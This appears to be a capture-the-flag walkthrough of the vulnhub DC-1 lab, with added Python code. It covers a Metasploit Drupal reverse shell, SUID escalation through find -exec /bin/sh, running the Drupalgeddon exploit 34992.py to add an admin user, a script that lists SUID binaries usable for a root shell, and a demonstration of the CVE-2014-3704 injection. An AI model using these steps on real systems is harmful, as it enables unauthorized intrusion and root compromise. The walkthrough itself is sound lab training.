Download link
Link: https://pan.baidu.com/s/1W3bEDx219EEsnGFUnDX3-Q
Extraction code: pm7e
Import the OVA file with VMware, and make sure both Kali and the target VM are attached to the same NAT network, otherwise the scan in the next step will not find the target.
After powering it on, the VM console shows only a login prompt and nothing can be done from the display itself; everything below is done from Kali.
Preparation
First check Kali's own IP address and netmask, so you know which subnet the NAT network uses.
Run an nmap host discovery scan across that subnet to find the target machine's IP.
Then scan the target's open ports and service versions.
Open the target IP in a browser: the site is running Drupal.
Testing
Use msf to check whether there is an exploit module for it: run msfconsole to start it.
Search for modules related to drupal, prefer one with a recent disclosure date, select it by its index number (here 1), and use a reverse-shell payload.
Check which options need to be set.
At this point only rhosts needs to be set, i.e. the target's IP; then run exploit.
A shell session opens.
Then use the usual Python one-liner to upgrade it to an interactive TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
Check the current account's privileges: it is a low-privileged account.
Privilege escalation
SUID privilege escalation abuses executables on which the administrator has set the setuid bit, so that they run with the privileges of their owner (root) no matter who starts them.
Standard query to list them:
find / -user root -perm -4000 -print 2>/dev/null
Look through the output for executables that are known to be usable for privilege escalation; here we use find.
find / -name cron.php -exec "/bin/sh" \;
// Some path on the system contains a file named cron.php, so -exec runs; the backslash escapes the semicolon that terminates -exec so the shell does not consume it
You can see that we now have root privileges: because the shell was started by a SUID binary, id reports an effective UID of 0 (the real UID is still the original user, which is enough to read the flags). /bin/sh is used rather than bash because bash drops the effective UID on start unless run with -p.
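The find command above is the manual version of this step. As an added example (not the page's or the author's code), the following Python re-implements the enumeration in a way that can be dropped onto a box that has Python but no shell tricks handy: it walks the filesystem like `find / -user root -perm -4000`, skips pseudo-filesystems, and filters the hits against a short, assumed list of binaries that GTFOBins documents as giving a root shell when SUID. The demo() function builds a throw-away directory of empty stand-in files (constructed, not real binaries) so the logic can be exercised without being root.

```python
import os
import stat
import tempfile

# Subset of binaries that GTFOBins lists as usable for a root shell when they
# carry the setuid bit. Illustrative only (an assumption of this example).
KNOWN_SUID_ESCALATORS = {
    "find", "vim", "vi", "nmap", "bash", "python", "python2", "python3",
    "perl", "env", "cp", "mv", "less", "more", "awk", "gawk", "tee",
}
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def find_suid(root="/", owner_uid=0):
    """Regular files under `root` with the setuid bit, owned by `owner_uid`
    (0 = root): the same set `find / -user root -perm -4000 -print` prints."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        # Do not descend into pseudo-filesystems: slow to walk, no real binaries.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)        # lstat: judge the file, not a symlink target
            except OSError:
                continue                   # unreadable entry, like find's 2>/dev/null
            if (stat.S_ISREG(st.st_mode)
                    and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                hits.append(path)
    return sorted(hits)


def escalation_candidates(paths):
    """Keep only the SUID files whose name has a known root-shell recipe."""
    return [p for p in paths if os.path.basename(p) in KNOWN_SUID_ESCALATORS]


def suid_shell_command(path):
    """The page's recipe for a SUID find; other binaries need their own
    recipe. -quit stops find after the first match so only one shell spawns."""
    if os.path.basename(path) == "find":
        return f"{path} / -name cron.php -exec /bin/sh \\; -quit"
    return None


def demo():
    """Build a temporary tree of empty stand-in files (constructed for this
    example) and run the enumeration on it as the current user."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    layout = {"find": 0o4755, "ls": 0o755, "bin/vim": 0o4755, "bin/ping": 0o4755}
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
        os.chmod(path, mode)
    found = find_suid(root, owner_uid=os.getuid())
    rel = lambda paths: {os.path.relpath(p, root) for p in paths}
    return rel(found), rel(escalation_candidates(found))


if __name__ == "__main__":
    suid, usable = demo()
    print("setuid files:", sorted(suid))
    print("usable      :", sorted(usable))
    for p in find_suid("/"):                      # real run on this host
        cmd = suid_shell_command(p)
        print(p, "->", cmd or "(check GTFOBins)")
```

On the target you would call find_suid("/") with the default owner_uid=0; the demo uses the current user's UID only because the stand-in files cannot be owned by root without root.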
Find the flag files.
Check them and the box is done.
Drupal classic vulnerability
CVE-2014-3704 (Drupalgeddon) is a pre-authentication SQL injection in Drupal 7's database layer; the public exploit uses it to add an administrator account and works against Drupal 7.0 through 7.31 (fixed in 7.32).
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) - PHP webapps Exploit
After downloading it is a .py file (34992.py). Run it from the download directory; without arguments it prints its parameter usage.
Run it against the target, giving the user name and password of the account to create:
python 34992.py -t http://192.168.80.129 -u 123 -p 123
Copy the login URL it prints and open it in the browser.
Log in with those credentials; if you reach the Drupal administration back end, you have administrator privileges on the site.
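What 34992.py actually exploits is Drupal 7's placeholder expansion: when a query parameter is an array (the login form's name field can be sent as name[key]=value), expandArguments() generated one placeholder per element named after the array's own keys, which the client controls, and spliced those names straight into the SQL. The following is an added example, not the page's or Drupal's code: a Python port of that expansion with a patched switch that applies the 7.32 fix (re-index with array_values() before building the names), run over a constructed login request. The query is a simplified stand-in for Drupal's login lookup and the injected UPDATE is only a marker; the real exploit's payload (which inserts a user row with a known password hash) is not reproduced here.

```python
import re
from urllib.parse import parse_qsl, quote

# Simplified stand-in for the login lookup; not Drupal's exact statement.
LOGIN_QUERY = "SELECT * FROM users WHERE name = :name AND status = 1"

# Constructed attacker request: the array *key* carries the SQL, the value is junk.
PAYLOAD_KEY = "0;UPDATE users SET name='owned' WHERE uid=1 -- "
EVIL_REQUEST = f"name[{quote(PAYLOAD_KEY)}]=x&name[0]=y"
BENIGN_REQUEST = "name[0]=admin"


def php_form_array(query_string, field):
    """Mimic PHP's request parser: field[key]=value pairs become one
    associative array whose keys were chosen by the client."""
    values = {}
    for key, value in parse_qsl(query_string, keep_blank_values=True):
        m = re.fullmatch(re.escape(field) + r"\[(.*)\]", key)
        if m:
            values[m.group(1)] = value
    return values


def expand_arguments(query, args, patched):
    """Port of Drupal 7's DatabaseConnection::expandArguments().

    For each placeholder bound to an array, emit one placeholder per element
    named <placeholder>_<key> and rewrite the query to list them. Unpatched
    code used the array's own keys; the 7.32 fix re-indexes first, so the
    names are always <placeholder>_0, _1, ... whatever the client sent."""
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        if patched:
            data = dict(enumerate(data.values()))     # array_values(): keys 0, 1, ...
        new_keys = {f"{key}_{i}": value for i, value in data.items()}
        # preg_replace('#:name\b#', implode(', ', array_keys($new_keys)), $query)
        query = re.sub(re.escape(key) + r"\b", lambda _m: ", ".join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


def build_login_query(query_string, patched=False):
    """Parse the form like PHP would, then expand the :name placeholder."""
    names = php_form_array(query_string, "name")
    return expand_arguments(LOGIN_QUERY, {":name": names}, patched)


if __name__ == "__main__":
    for label, patched in (("vulnerable", False), ("patched", True)):
        q, a = build_login_query(EVIL_REQUEST, patched)
        print(f"[{label}] {q}")
        print(f"           args={a}")
```

The vulnerable run puts the attacker's UPDATE into the statement text before any parameter binding happens, which is why this is injectable despite the use of placeholders; the patched run yields a malformed but harmless `name = :name_0, :name_1`, showing that the fix removes attacker control of placeholder names rather than making odd input valid.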
Complete walkthrough: from flag1 to flag5
Reference (video, to be read together with this article): [Basic direction] Super detailed explanation of the vulnhub lab DC-1, on bilibili (哔哩哔哩)